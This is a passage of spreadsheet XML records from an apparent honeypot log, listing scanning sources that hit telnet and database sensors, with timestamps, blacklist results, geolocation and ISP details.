  </r>
  <r>
    <x v="3110"/>
    <x v="3110"/>
    <s v="NA&amp;&amp;114-35-90-231.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T19:01:04"/>
    <d v="2024-12-16T15:15:22"/>
    <d v="2025-04-04T19:01:04"/>
    <n v="231"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:5ae7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3111"/>
    <x v="3111"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:52:27"/>
    <d v="2025-04-04T18:52:27"/>
    <d v="2025-04-04T18:52:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="TT"/>
    <s v="Trinidad and Tobago"/>
    <s v="POS"/>
    <s v="Port of Spain"/>
    <s v="NA"/>
    <s v="Port of Spain (Downtown)"/>
    <s v="3573890"/>
    <s v="NA"/>
    <s v="10.6556"/>
    <s v="-61.5146"/>
    <s v="27665"/>
    <s v="AS27665"/>
    <s v="Columbus Communications Trinidad Limited."/>
    <s v="corporate"/>
    <s v="Columbus Communications Trinidad Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be53:b25c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3112"/>
    <x v="3112"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:49:40"/>
    <d v="2025-04-04T18:49:40"/>
    <d v="2025-04-04T18:49:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b61:915f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3113"/>
    <x v="3113"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:42:34"/>
    <d v="2025-04-04T18:41:42"/>
    <d v="2025-04-04T18:42:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="RJIL East FTTX PUBLIC"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:6713"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3114"/>
    <x v="3114"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:39:52"/>
    <d v="2025-04-04T18:39:52"/>
    <d v="2025-04-04T18:39:52"/>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3:1606"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3115"/>
    <x v="3115"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:30:01"/>
    <d v="2024-12-01T01:14:28"/>
    <d v="2025-04-04T18:30:01"/>
    <n v="79"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="2004-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b18:c0b5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3116"/>
    <x v="3116"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:29:49"/>
    <d v="2024-12-05T17:46:21"/>
    <d v="2025-04-04T18:29:49"/>
    <n v="164"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H31"/>
    <s v="1433&amp;&amp;63883&amp;&amp;63940&amp;&amp;63957&amp;&amp;63972&amp;&amp;63989&amp;&amp;64099&amp;&amp;64038&amp;&amp;64073&amp;&amp;64088&amp;&amp;64053&amp;&amp;64221&amp;&amp;64137&amp;&amp;64163&amp;&amp;64180"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="100"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Koramangala 1A Block)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9285"/>
    <s v="77.6332"/>
    <s v="132559"/>
    <s v="Gatik Business Solutions"/>
    <s v="Gatik Greenergy PVT LTD"/>
    <s v="business"/>
    <s v="Gatik Greenergy PVT LTD"/>
    <s v="2022-04-12"/>
    <s v="GREENERGYPVTLTD"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ba:4528"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3117"/>
    <x v="3117"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:19:58"/>
    <d v="2025-04-04T18:08:37"/>
    <d v="2025-04-04T18:19:58"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ebe:587d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3118"/>
    <x v="3118"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:14:19"/>
    <d v="2025-04-04T18:14:19"/>
    <d v="2025-04-04T18:14:19"/>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7:9737"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3119"/>
    <x v="3119"/>
    <s v="220-130-182-179.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:14:15"/>
    <d v="2024-12-15T07:47:49"/>
    <d v="2025-04-04T18:14:15"/>
    <n v="328"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc82:b6b3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3120"/>
    <x v="3120"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:10:35"/>
    <d v="2025-04-04T18:10:35"/>
    <d v="2025-04-04T18:10:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:9155"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3121"/>
    <x v="3121"/>
    <s v="NA&amp;&amp;114-32-166-182.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T18:01:08"/>
    <d v="2024-12-15T13:33:49"/>
    <d v="2025-04-04T18:01:08"/>
    <n v="480"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;NA&amp;&amp;80"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:a6b6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3122"/>
    <x v="3122"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T18:01:02"/>
    <d v="2025-03-04T16:48:43"/>
    <d v="2025-04-04T18:01:02"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Geylang)"/>
    <s v="1880252"/>
    <s v="389730"/>
    <s v="1.33296"/>
    <s v="103.894"/>
    <s v="56300"/>
    <s v="MYREPUBLIC LIMITED"/>
    <s v="Myrepublic Limited"/>
    <s v="business"/>
    <s v="MyRepublic Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9e8c:913b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3123"/>
    <x v="3123"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:55:39"/>
    <d v="2024-11-25T10:59:32"/>
    <d v="2025-04-04T17:55:39"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H29"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Ahmadabad"/>
    <s v="Ahmedabad (Shahibaugh)"/>
    <s v="1279233"/>
    <s v="380001"/>
    <s v="23.0591"/>
    <s v="72.5875"/>
    <s v="45916"/>
    <s v="Gujarat Telelink Pvt Ltd"/>
    <s v="gtpl hariom world vision"/>
    <s v="business"/>
    <s v="Gtpl Broadband Pvt. Ltd."/>
    <s v="2014-11-17"/>
    <s v="GUJARATKUTCHNETWORK"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2be0:aa1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3124"/>
    <x v="3124"/>
    <s v="syn-069-145-152-219.res.spectrum.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:45:41"/>
    <d v="2025-03-01T12:38:31"/>
    <d v="2025-04-04T17:45:41"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MT"/>
    <s v="Montana"/>
    <s v="Missoula"/>
    <s v="Missoula"/>
    <s v="5666639"/>
    <s v="59801"/>
    <s v="46.8501"/>
    <s v="-113.987"/>
    <s v="33588"/>
    <s v="Charter Communications"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="2003-05-13"/>
    <s v="NET-CORE-BB-1"/>
    <s v="2014-02-18"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-07-27 04:00:00"/>
    <s v="2025-07-26 04:00:00"/>
    <s v="2024-07-22 05:41:39"/>
    <s v="['NS1.CHARTER.COM', 'NS2.CHARTER.COM', 'NS3.CHARTER.COM', 'NS4.CHARTER.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Domain Admin"/>
    <x v="19"/>
    <s v="NA"/>
    <s v="12405 Powerscourt Drive"/>
    <s v="::ffff:4591:98db"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3125"/>
    <x v="3125"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:29:16"/>
    <d v="2025-04-04T17:29:16"/>
    <d v="2025-04-04T17:29:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:523c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3126"/>
    <x v="3126"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:21:49"/>
    <d v="2025-04-04T14:10:19"/>
    <d v="2025-04-04T17:21:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="True"/>
